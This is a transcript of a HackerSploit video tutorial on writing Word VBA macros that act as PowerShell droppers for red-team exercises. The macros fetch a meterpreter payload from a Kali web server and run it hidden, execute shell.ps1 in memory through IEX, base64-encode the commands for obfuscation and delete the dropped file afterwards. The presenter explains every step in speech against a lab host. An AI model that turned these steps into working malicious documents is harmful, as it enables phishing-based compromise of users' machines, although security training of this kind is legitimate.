# Offensive VBA 0x3 - Developing PowerShell Droppers

## Метаданные

- **Канал:** HackerSploit
- **YouTube:** https://www.youtube.com/watch?v=ot3053UxJOc
- **Дата:** 28.01.2025
- **Длительность:** 55:20
- **Просмотры:** 4,816

## Описание

In this episode of the Offensive VBA series, we take VBA macros to the next level by developing PowerShell droppers designed for red team operations. Learn how to craft stealthy and effective VBA scripts that deliver and execute PowerShell payloads seamlessly.

Here’s what we’ll cover: Writing VBA macros to execute PowerShell scripts, executing payloads directly in memory for stealth, leveraging environment variables to identify system paths dynamically, and techniques to remove traces of macro execution for stealthier operations


// Adversary Emulation Labs
New to CYBER RANGES? Register here: https://bit.ly/40dRMsb
CYBER RANGES Adversary Emulation Labs (Free): https://bit.ly/4amBPEU

🎥 Have an idea for a video? make your submission here: https://forms.gle/VDwwMsuudzQfT9VM6

// MORE RESOURCES
HACKERSPLOIT BLOG  ►► https://bit.ly/3qjvSjK
HACKERSPLOIT FORUM  ►► https://bit.ly/39r2kcY
HACKERSPLOIT ACADEMY ►► https://bit.ly/39CuORr
CYBER RANGES (LABS) ►► https://app.cyberranges.com

// SOCIAL NETWORKS
TWITTER ►► https://bit.ly/3sNKXfq
INSTAGRAM ►► https://bit.ly/3sP1Syh
LINKEDIN ►► https://bit.ly/360qwlN
PATREON ►► https://bit.ly/365iDLK
MERCHANDISE ►► https://bit.ly/3c2jDEn

// MY BOOKS
Privilege Escalation Techniques ►► https://amzn.to/3ylCl33
Docker Security Essentials (FREE) ►► https://bit.ly/3pDcFuA

// SUPPORT THE CHANNEL
NordVPN Affiliate Link (73% Off) ►► https://bit.ly/3DEPbu5
Get $100 In Free Linode Credit ►► https://bit.ly/3yagvix

// CYBERTALK PODCAST 
Spotify ►► https://spoti.fi/3lP65jv
Apple Podcasts ►► https://apple.co/3GsIPQo

// WE VALUE YOUR FEEDBACK
We hope you enjoyed the video and found value in the content. We value your feedback, If you have any questions or suggestions feel free to post them in the comments section or contact us directly via our social platforms.

// THANK YOU!
Thanks for watching!
Благодарю за просмотр!
Kiitos katsomisesta
Danke fürs Zuschauen!
感谢您观看
Merci d'avoir regardé
Obrigado por assistir
دیکھنے کے لیے شکریہ
देखने के लिए धन्यवाद
Grazie per la visione
Gracias por ver
شكرا للمشاهدة

-----------------------------------------------------------------------------------
#pentesting #cybersecurity #hacker

## Содержание

### [0:00](https://www.youtube.com/watch?v=ot3053UxJOc) Segment 1 (00:00 - 05:00)

hey guys hack exploit here back again with another video Welcome Back to the offensive VBA Series in this video we're going to be exploring uh the different ways uh you can go about creating a uh VBA macro that essentially um utilizes Powershell to drop a file or you know acts as a dropper so if you're familiar with the red teaming or pin testing in general uh you know simply put a dropper is a payload or an executable that when executed downloads another file um and in red teaming operations droppers are used to actually download the payload that um that then performs whatever task or action you want it to perform so for example you know um spawning a reversal um so on and so forth and uh the key is uh in this video to go beyond just downloading the file but also exploring um the process of downloading and executing different types of executable so you know configuring our dropper to be versatile and more importantly um in line in alignment with uh you know operational Security in red teaming this will also involve um inmemory execution of Powershell scripts because again uh exes are rarely used although I will be using them um in my example so first things first uh we you know we're going to be taking a look at quite a few examples if you're new to the series I would recommend you take a look at um episode two where we explored uh program and command execution primarily because I explained a lot about objects there and again objects feature quite a bit um in VBA anyway um I'm on my Windows system and I'm going to open up office create a new blank document I'm just going to say it as I'll go into my desktop here I'm going to save it as uh we'll just call it dropper do uh yeah dropper and then we'll save it as a docm so macro enable document and then we'll go into developer macros select this document and then create a macro you know just to begin with called dropper and there we are so um I'm going to um create the sub routine Auto open so that when the document is opened the word macro is automatically executed um you know in the event of macro Security in word uh the user would click on enable or run macro um and then you know the macro that we are going to develop is going to be executed so um we're just going to create another sub routine here called uh we can just call it PS dropper something very simple like so and we're going to create a um object called PS dropper so dim uh you can call yours whatever you want if you're following along um I'll also be um trying I think I'll set up a GitHub repo for this series so you can find these scripts because there'll be many variations this is sort of the basic one we're starting off with so we're then going to set PS dropper um and we going to say we're going to create a reference and uh in this case we're creating object and we're going to utilize wind script so wind script do shell and I'll explain what this is if you miss the previous episode but now we're going to call or utilize uh the wind script uh I think we're going to use the run method to execute our Command so we're going to say PS dropper uh if I can type that in correctly so PS dropper do run and then we specify our partial command so partial exe and then we can say uh command um and our syntax needs to be uh quite accurate here so we're going to because we're now specifying the command we're going to use a double quote there so invoke um we use web request you know to download um a file and I'll show you what we'll be downloading and from what system um and then the URI is going to be and then this is where you specify the actual URI or you know URL um of the web server that's hosting the file that you want your dropper to download so in my case I've just connected via RDP to my Cali Linux system just running on my local network you can see on my desktop uh with msf Venom I've uh created a meterpreter payload called adobe. exe and shell. PS1 so you know just a Powershell um it's actually a meterpreter pow shell payload so uh I'm

### [5:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=300s) Segment 2 (05:00 - 10:00)

going to set up a web server on the Cali Linux system here and uh I'm going to run it on Port 880 now the IP address of the Cali Linux system is 192 168 uh 2. 24 so let's you know add that in now so I'm going to say HTTP 1921 168 um 224 and then 8080 and then the name of the file is Adobe. exe we'll start with the most basic um and then we going to specify the out file so what we want it saved as and where we'll talk a little bit about utilizing environment variables in poell to identify the users temporary directory um but in this case we'll go for the most obvious which is C users public you know the most obvious staging location that's again used by red teers and we'll just call it adobe. exe so something inconspicuous and then um we're going to say start process so we'll utilize poh start process commandlet and then specify you know the path to the binary that we actually want to start the process for or with if you will so we've already saved it at this point and it's going to be under users public and um the name of the file is uh just a ob. exe okay um and now once that is done we are we need to close the other ones here and then we'll specify the windows style parameters uh zero so it's hidden again I cover this in episode two of offensive VBA and then false I'll explain that and yeah so that looks good um all right so I think to test this out um it's obvious L wise to you know test and debug while in the IDE this is typically what red teamers do and then you can see whether your macro actually you know reaches out to the uh web server um and does its job so you know downloads or drops I should say the payload or file that you want it to drop and then executes it doesn't need to execute it you could just be staging it for a later uh you know to be used later but you know we can test it out I think the best way to test it out is to save this document and we'll open it as a normal user would so there we are all right just resized my window you can still see the web server here on Cali and um I've already set up a Metasploit session here the payload is set correctly um and so I'll just run because this particular dropper will not only drop the payload but also execute it with Powershell now again this is very basic we'll get to the good stuff shortly but we need to test this out so I'm going to open up the document enable content and uh let's see if we get a get request on our web server here um let's see uh nothing okay interesting uh that's very strange so looks like we need to investigate this a little bit macros uh edit um okay so let's see where we have gone wrong so uh that I specify the address correctly so 8080 ad adobe. exe um out file C users uh public adobe. exe start process uh that looks all right and then Al yeah that should be good vs dropper do run huh that looks all good uh nothing here so this is very strange indeed uh in this case let see um actually hold on I still want to continue this if I now utilize the predefined document open sub routine I'm going to save this and uh let's try and run this again okay so presumably the macro is running um port 8080 yeah that's correct uh let me just see if I have the correct IP I indeed I do so 24 okay still not working interesting uh let's do some actually yes I found my mistake this is a stupendous mistake in fact and I found it so I'll just call the OB object

### [10:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=600s) Segment 3 (10:00 - 15:00)

object dropper because it's conflicting with the um actual sub routine name so that's a you know incredibly stupid mistake uh so we'll go ahead and open it up again now let's check it here let's see if we get a get request here uh still nothing that's very interesting uh macros edit huh that's very strange so PS create dropper do run create object yeah that looks good uh let me see micros edit let's run it here okay so here it is working but why is it not working there uh okay so we should have got the session here all right so I'm going to terminate this okay so we got the session we know it's working we had two get requests uh let me do this again here uh Call PS dropper okay save that there save this document and uh let us go ahead and uh run it one more time or open it again as a normal user would there we are so now it's working as it should and uh ah forgot to run uh the Handler so he can receive our interpreter session I think we should be able to get yeah there we are fantastic so very basic dropper uh reaches out to a remote web server and downloads in this case a uh Windows portable executable or PE which is just basically an executable um and again you don't have to use Metasploit to anything I'm just showing you how this works okay so um let me kill that session there cuz I have a few other examples I want to get into so uh let's set up the web server again and I'll now go back into my macros uh edit uh let me get rid of this uh all right so that's the first example let's get rid of this one here and we're going to now take a look at the second example uh by the way I think I told you I was going to mention so the options here uh with regards to false which uh I mentioned the window visibility or window style but um this parameter here when utilizing um run in this particular case just uh it's essentially used to control uh or tell it controls the VBA macro execution so um when it's set to false um it will execute in this case the Powershell command or code uh asynchronously which means uh VBA um The Interpreter will not wait for the command to finish before moving to the next line of code if there is a you set it to true then this will execute the command or whatever you're trying to execute in this case the partial command synchronously which means VBA will pause until the command is done or is completed execution so it's just um you know controlling um execution control in this case so the that begs the question why should we use false well you know it's obvious uh you know for the purposes or objective of stealth and efficiency or obsc in red team operations asynchronous execution allows the the macro itself uh to you know essentially uh execute quickly um and it doesn't need to wait for the Powell command to complete executing so um let's take a look at uh the second example which is uh you know fileless execution so uh as you can obviously tell um with this particular macro this is um very basic and obviously quite stupid and is likely never to work the reason for that number one is the artifacts so you're actually saving a payload to disk which again even the most rudimentary uh signature-based antivirus solution will detect so what's the next logical step in terms of evolving you know our techniques or our skill well that uh brings us to execution uh in

### [15:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=900s) Segment 4 (15:00 - 20:00)

memory execution now because this video is specific to you know creating a Powershell based dropper um we are going to need to leverage um pow shells invoke expression or IEX uh which you know pretty much allows us to avoid writing um payloads or executables or any file really that we're dropping to disk if they are indeed executable and if they are executable it um you know allows us to or will pretty much executed directly in memory and because again this is constrained to pow shells I ex or invoke expression it needs to be typically a Parell file um or a Parell module if you will so that's why um if I go back into my C Linux system here that's why I generated the partial uh payload here um this is a interpreter payload and so um I believe it still has the same options or uses the same um Ms uh the same metlo or msf Venom payload which is Windows uh you know 64-bit meterpreter payload reverse TCP so I'll just run the Handler here and um we have the web server running and it's hosting all of these files so shell. PS1 so okay great um let's get rid of this here now and let's take a look at how to create this so I'm going to create a new sub routine called uh file less dropper you know so we can be a little bit more explicit and then I'll just stick to my object name here uh that we used previously which is PS dropper and um that's going to be as object and then we're going to say Set uh PS droper is equal to create object um and in this case wind script and now we are going to say PS dropper do run uh powershell. exe a bit of stealth so no profile um and then because we're using I ex or invoke expression we're going to need to set the execution policy to bypass and then the command is going to be I uh so and then uh we're going to say uh new object and uh we'll utilize uh let's utilize net web client still I think we used it previously and then do download string and then in here HTTP the URL or the address of the server from which you're downloading the file or the macro is to you know essentially get and drop the file from or the payload so 192 in this case 168 uh2 24. 8080 the name in this case is shell. PS1 an executable will not work cuz again we're using invoke expression so it needs to be poal in this case or something that can be executed um so we'll uh close this in here and we add uh three and then we'll just say zero window style and then false and uh that should be good so now uh so yeah it's going to it's not going to save any that's why we haven't specified a path so I'm now going to save this and again I'll just uh open up the document again and before I do that let me just minimize this so you can actually see it in real time and uh I mean the Cali Linux system so there we are let me just resize the windows accordingly there we go uh clean things up a little bit so dropper uh let's see shell. uh PS1 I think I know my mistake uh document that fin is droper BS Dro a run create object yeah that looks good power shell buy execution policy bypass command ex uh new object let's see and uh one second let me just check this okay so nothing there yet um let me just try running it here uh oh yeah my bad uh actually hold on let's get rid of this

### [20:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=1200s) Segment 5 (20:00 - 25:00)

here uh close this up hold on and save that there let's open up the document again yeah I I'm actually hold on let's see uh Auto open okay I'm just going to call file less dropper if I can type that in correctly okay let's try this again I saved that so uh let's see this now okay there we are so yeah calling because again I think I messed up the macro names so I've changed them too much and then here there we are sending stage actually with pow shell it's probably wise to use a uh not unstaged payload because in this case uh this can be quite uh heavy or actually yeah um let's see we should get a session but regardless that's how to again develop a uh fileless paral dropper and again this can be any partial script that you want really you can also execute a partial command really doesn't matter but because again we're focusing on droppers this is what um can be done um we'll wait for that uh if I go into developer here into macros uh edit here uh let me just check and see whether we get it that would be fairly interesting but yeah I think uh non-staged would work well even a very basic one in the next video we'll take a look at my go-to technique for shells I don't utilize um msf Venom or MPR I utilize power cat and that's even much simpler but uh I'll then show you how to include again if you're not using um a dropper to download your payload I'll show you how you can include your payload uh msf Venom or whatever even poell Empire directly in your VBA macro that will be the video after the next one and then we can resume to the adverse ulation series anyway uh yeah this I don't think we would have gotten it so probably yeah most likely we would need to have created a non-staged one cuz I created a standard staged meterpreter payload or maybe even a better option or technique would be to utilize um what is it to utilize uh something like an HDA payload however um in this case let's see I'm just going to run it one more time uh there we are get request there okay just going to wait here uh when was this made yes okay that is very strange that we're not getting it now anyway I don't waste too much time on this but I think we should be able to get it cuz we got the get request here um anyway it's probably wise let me just stop that there uh unless we set the exit function to thread that actually is probably better let's try this again okay H very strange H we may have done something anyway I'm going to move on to the next Technique we can leave this running you get the idea um so uh that's the fileless execution um what did I want to cover next uh yes obfuscation of poell command so we're now getting into the more realistic stuff and as you know this is quite important so uh you know whenever you're developing your Macros you always have to be open to the fact that you your macro you know not might be it probably will be analyzed again I'm assuming you're not doing anything malicious but uh this is sort of the beginning of uh the stealthy aspect and I'll keep it rather simple uh the most basic of OB obfuscation techniques is base 64 so um we can actually try that um that's very interesting anyway bottom line is that's how that works so uh we are going to be base 64

### [25:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=1500s) Segment 6 (25:00 - 30:00)

encoding uh we can also utilize actually a um we can utilize uh the inmemory execution and it can also be a partial um file or payload uh which means uh if I'm to generate this again so we say msf Venom uh x64 um actually we can go for CMD uh CMD Windows uh let's see CMD Windows partial uh no I don't want I want a nonstaged one let me just see here so we actually don't need partial uh we can go for let's see Windows partial reverse TCP how about this okay so I'll will generate this and replace that one so L Port same thing shell. PS1 okay let's actually try and run this macro once again so Set uh in this case set we need to configure the handlers so set payload to this and then show options uh no modules and then yeah let's see if this actually works so we had made three requests previously uh let's get that running okay there we go fourth one unless my metlo has bugged out that could be the case cuz I should be getting the sessions or po shell uh on the window Windows system cuz yeah it is indeed executing it so I may need to restart the system or kill that process just give me a second all right so I'm not really sure what the issue is it may be uh something stalled here which uh is actually a very good thing CU I'm going to outline um a technique here as well or I should say another technique um let's see this is still running here I'm just going to uh try and open up the dock again okay that executes all right okay yeah no problem so we can actually proceed so yeah the next technique was the obfuscation of uh commands so let's take a look at that more specifically partial commands all right so um in terms of um the next example where we will be obfuscating partial commands I created a uh partial script to do the encoding for us um on my desktop here just going to say edit we'll use the Parell um ID or editor IC they thing they call it um and actually I should have just opened it up with uh with the word there um but uh not with word what am I saying with um let say open yeah with notepad so basically what it does is it encodes the following partial command so IEX that's what we want to base 60 in uh base 64 incode so pretty much the command that um you know gets and then executes uh our po shell uh payload in memory and uh the reason as to why we're using Powershell as opposed to any other form of encoding is uh primarily to ensure that it aligns with uh with what power shell expects so you know in this case Unicode um and then you know just very basic Basics defo coding um so in my case I've already set the address of the web server hosting the Powershell um the partial payload which in this case I've modified slightly so that it can actually work so let me just uh connect to my Cali Linux system uh like so um okay all right there we are and I'll just explain what was done so what I was able to do is again remember I told you the primary issue was uh the staged payload so I generated a new uh

### [30:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=1800s) Segment 7 (30:00 - 35:00)

non-staged payload just a Parell reverse TCP payload with msf Venom just called it shell. PS1 and I also set up the Handler here um and it is configured uh to use that particular payload the options already set in this case the only difference is L Port is set to 1 2 3 4 we have our web server running here on the desktop we have shell and Adobe Etc so I I'm going to um run the web server again or you know just launch it and then now I am going to open up a uh poell command uh here so I'll go into my desktop if I can let's see desktop and I'll execute uh and code there we are so that's what we want to copy um and of course I think I'll need to copy it like so let's go into notepad uh there we are perfect so now we'll keep that handy in our macro we're going to get rid of this here um I'm we'll just call it fileless dropper so we have the you know PS dropper object we then created the object so that we can access wind script um we're now going to create another object here not an object a variable called encoded command you can use whatever name you want to store the actual encoded command and then um let's see so we have that there let's separate these two we'll get rid of this I'm just going to get rid of this here entirely cuz I don't think we need it and or not that we don't need it but uh it's not really valid so encoded command that's going to be equal to the B 64 encoded parall command so this is again very basic obfuscation but I just want to show you how you can then execute it so now we can say PS dropper do run and then you know par shell. exe we still pre specify the execution options arguments like uh no profile execution policy the reason I'm not using the shorthand or abbreviated format is so that again you understand what I'm doing otherwise I could have just said EP right uh but uh bypass now partial has a command let as you know um or you may not know called encoded command with which you know just um allows po shell to decode it in this case it's base 64 is what is encoded and then we'll concatenate and say and specify the variable that's holding the encoded command uh we'll set the visibility AB ility to Hidden and false okay so now let me open up the C system here so we have the web server um and if we take a look at that there we can see yeah all right so let's uh run this here I'm just going to run the Handler and then we'll take a look at our web server so why don't we actually open the document and see it live we'll do it live all right so there we go micro should run did I no we didn't change any name or anything like this uh let's see let us see okay nothing so um is this my mistake f as dropper yeah PS encoded command uh that's said correctly power PS dropper do run par shell no profile execution policy bypass ah my mistake always my mistake uh ta yeah syntax is always going to kill me so we'll open it up again and there we go we can see it gets shell and then here there we are wonderful and we get a poell session and uh now we can enumerate some system information here and there we go so yeah that's um obfuscation very basic now there's other forms of obfuscation that will get into you know tools like um I can't remember what's the name of the uh partial utility that is used um invoke obus skate or something like um I can't actually remember it I think I've covered it in a previous video in any case you know there's other forms of

### [35:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=2100s) Segment 8 (35:00 - 40:00)

obfuscation in terms of your macro cuz obviously you don't want it to be analyzed so that will involve first and foremost uh not being like me and using um very descriptive variable names so you know you want to go for something very random in fact I'll probably make a video where we analyze the uh the macros generated by Metasploit or the macro enable document generated my Metasploit so you can see what type of obus ation um occurs there um anyway one more technique I think I can show you just based on how much time we have or how long this video has been um let's try and uh utilize how about um uh let's try and utilize environment variables for dynamic execution so uh sort of moving away from in memory execution let's say we wanted to again save a file um you know payload in this case we'll use the Adobe interpreter payload um what if you know we don't want to specify or take any chance you know any chances in terms of where we want to save stuff but have it have the macro dynamically via po shell detect um you know the users or you know specific paths in this case the most obvious would be the temp um environment variable which will essentially allow power shell to save it in a you know in the Target system or Target users specific temp path uh if that has been configured but uh the way this would look is as follows so uh let me get uh rid of this here we're going to create a new sub routine I'll just call this uh sub um Dynamic dropper okay something like this and then we're going to say dim PS dropper as object and again I know this is a bit repetitive but uh then we want to create another variable we'll call it download by the way what I'm doing you should not do for variables cuz this is pretty obvious what they're doing um you know if from the perspective of stealth these should not be descriptive at all anyway so PS dropper is equal to um in this particular case create object and then we're going to say in here wind script not Shell close that up there and then now the download path uh we're going to set download path this is the dynamic aspect is going to be equal to environment variable or Environ and then temp uh so the users temp directory whatever that's been configured in the form of an environment variable and then we're going to save it as uh we'll just save it as adobe. txt uh not txt do exe my bad that would not allow us to execute anyway so we then say PS proper. run um and in here we say um partial exe command and then we can say invoke uh web request uh the URI is uh make sure my syntax is correct there 192 2 168 224 880 adobe. exe and then we also need to specifying out file name and path so out file and uh let's see out file um yeah because we're concatenating we need to close that one and then say download path uh concatenate again and then close that up there and then close the single quote and uh then we can say start process cuz we need want to execute it although this is not really required start um and uh let's see okay so start process and then uh let us go ahead and uh specify the download path so concatenate that there then we opened up a single quote here um and then uh zero okay that looks solid now um in here we need to set the payload uh the correct payload uh let's maintain that session

### [40:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=2400s) Segment 9 (40:00 - 45:00)

sessions okay set payload uh Windows x64 interpreter reverse DCP this is the payload used to generate adobe. EXC uh x64 okay let me just adjust the position of my keyboard uh elport okay so we have the server we have adobe. exe here let's just uh verify where they specified everything correctly uh yeah that looks good so now uh let me call okay we'll try and open up that again so we'll look out for that now um okay there we go should get a get there we are fantastic Mator session boom very nice so you know where did it save it well it saves it in uh the user temp directory on Windows you can access your temp directory us using the Run dialogue and then uh temp um and we hit enter so in here we should find Adobe there we are. exe very nice very clean and now the main question is can we create a dropper that not only downloads a payload executes it but also has some anti-forensic qualities and cleans up after itself this is the mark of a very uh you know of a good red teamer is to clean your artifacts that you're generating so uh we can actually do that so what I'm going to do is uh we'll save it in this case uh where are we saving it let's try uh yeah we'll do it on the desktop I think that makes the most sense so users so you can actually see it admin desktop okay so we'll just keep that path ready I'll now go into the macro here macro edit um and uh we'll just call it Dynamic dropper um we don't we won need that um we will not need this as well the only thing we'll need here is so invoke web request URI okay out file start process and then now before we do anything else so start um yeah we probably need to write this again Cu uh yeah so invoke web request let's see uh yeah we probably need to write it again no problem so we'll say PS dropper uh BS dropper do run and then marshall. exe in this case we not specify any more options and uh we'll say invoke web request uh urii and that's going to be HTTP 24 8080 adobe. EXE let us uh terminate uh this session and run it again just to have it ready okay so where was I um okay adobe. EXC uh right okay and then we want to so we have that there the URI then we want to out file specify the out file uh in this case we wanted to save it on the desktop if you remember so let's uh paste that then we'll just save it as adobe. exe and then now start the process right and then same thing in here and then we are going to remove

### [45:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=2700s) Segment 10 (45:00 - 50:00)

the item so delete it once we have executed it um we need to specify what we want removed so like so and then we can specify the windows style so hidden and then false uh that looks good to me so now uh let's save this save that close this I want us to pay attention to the desktop here so what I'll actually do now is I will just drag this slightly here um so that when it opens the dock you'll see adobe. exe saved on this system so let's open it up okay there we are saves it executes it and then it should delete it uh so let's see we get The Interpreter session does it delete it is it deleting it I don't know let's see uh micros edit maybe a permission thing remember there be remove item adobe. exe yeah um did I make a mistake there no I did not that is the correct syntax it may be because of the permissions and that's why I didn't want to save it on the desktop uh but nonetheless we can actually try this again okay so I'm just going to go into the macro once more and instead of saying we can actually save this in uh let's see what's a directory that can work here local dis users public uh we have the earlier one here so let us delete that so we'll use this path okay so let me make the modifications see users public and then remove the item like so and now let us save that okay just going to terminate this we'll keep an eye out in this directory here we have that running and uh there we go so we'll Now open up proper get a interpreter session Adobe here that should delete it uh probably after the process now but then that means this should have been deleted so interpreter session not EXE I just want to test something No it should have removed it that's very strange remove item that usually does it yeah remove item see users public yeah that should that looks good to me uh this may be because I think I know why uh this may be let's see what if we let's change the I just want to try this out here going to wait a minute did we get a session here okay we

### [50:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=3000s) Segment 11 (50:00 - 55:00)

didn't okay let's delete this one here this directory we should be able to make changes to both in terms of writing but also okay so I'm just modify the path here I just want to see what's stopping it cuz I know that the you know we would need to Halt and wait for the I've modified the payload to use the exit function as thread instead of process which is way might that might be the reason why it's not deleting it but I've set the path to the temp directory for the admin user um what I want to do within the macro is actually uh let's see so remove item um let's try and see if I can fix this so path and can we actually specify I'm take uh yeah we can say force over here let's try that okay um let me run this again and then we'll monitor we should find the Adobe file downloaded here so let me go ahead and uh start that again okay so there we are we see Adobe here yeah we should have the permissions to do that um still nothing so we get the session let X it just a second just want to debug this a little bit um yeah uh we should be able to delete that uh that's very strange indeed yeah no spe special permissions here yeah uh okay all right let's try something else here in the macro again apologies if this video is too long but um so we force and then okay so command uh let's say let's not use any profile so no profile execution policy bypass command and then invoke web request yeah that's fine out file uh out file start process let's see uh saves it in there now we can say we can tell this to wait wait okay and then remove item yeah and then force that and then set this to true for synchronous execution oh wait hold on okay wait that was just the windows stuff uh sorry the office stuff so let's run um and then over here once we have that going okay so that works we have a Doby in here yeah so it's going to wait for that to execute and then let's say if I hit exit shuts it down then it opens yes okay so in this particular case You' need to migrate um so that's how you can go about cleaning it anyway um it's always good to go back to the basics cuz I'd sort of forgotten about that and that's why the uh asynchronous and synchronous execution is so important uh in this case you know we're essentially stalled uh word um but yeah that's uh quite interesting so yeah I don't want to make this video too long those are the um the techniques that I wanted to outline this quite a bit I covered in this video and uh again um you know now we can move directly to the other stuff before resuming the adverse rul series hopefully this you know at least introductory set of videos has been useful uh with that being said

### [55:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=3300s) Segment 12 (55:00 - 55:00)

that's going to be it for this video guys thank you very much for watching if you have any um you know feedback questions leave them in the comment section if you found value in this video or liked it or you know enjoyed it leave a like down below and I will be seeing you guys in the next video

---
*Источник: https://ekstraktznaniy.ru/video/20358*